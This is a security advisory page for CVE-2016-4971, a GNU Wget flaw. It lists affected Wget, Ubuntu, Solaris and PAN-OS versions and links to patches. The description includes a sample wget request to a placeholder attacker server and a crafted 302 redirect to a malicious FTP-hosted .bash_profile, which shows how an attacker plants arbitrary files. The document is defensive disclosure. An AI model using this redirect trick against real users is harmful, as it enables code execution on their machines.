high
8.8
Advisory Published
CVE Published
Updated

CVE-2016-4971

First published: Tue Jun 07 2016(Updated: )

GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file. Because of lack of sufficient controls in wget, when user downloads a file with wget, such as: wget <a href="http://attackers-server/safe_file.txt">http://attackers-server/safe_file.txt</a> An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response: HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: <a href="ftp://attackers-server/.bash_profile">ftp://attackers-server/.bash_profile</a> Content-Length: 262 Server: Apache wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.

Credit: secalert@redhat.com

Affected SoftwareAffected VersionHow to fix
GNU Wget<1.18
Canonical Ubuntu Linux=12.04
Canonical Ubuntu Linux=14.04
Canonical Ubuntu Linux=15.10
Canonical Ubuntu Linux=16.04
Oracle Solaris=10
Oracle Solaris=11.3
Paloaltonetworks Pan-os>=6.1.0<=6.1.16
Paloaltonetworks Pan-os>=7.0.0<=7.0.14
Paloaltonetworks Pan-os>=7.1.0<=7.1.9

Remedy

http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1

Remedy

http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html

Remedy

https://bugzilla.redhat.com/show_bug.cgi?id=1343666

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2024 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203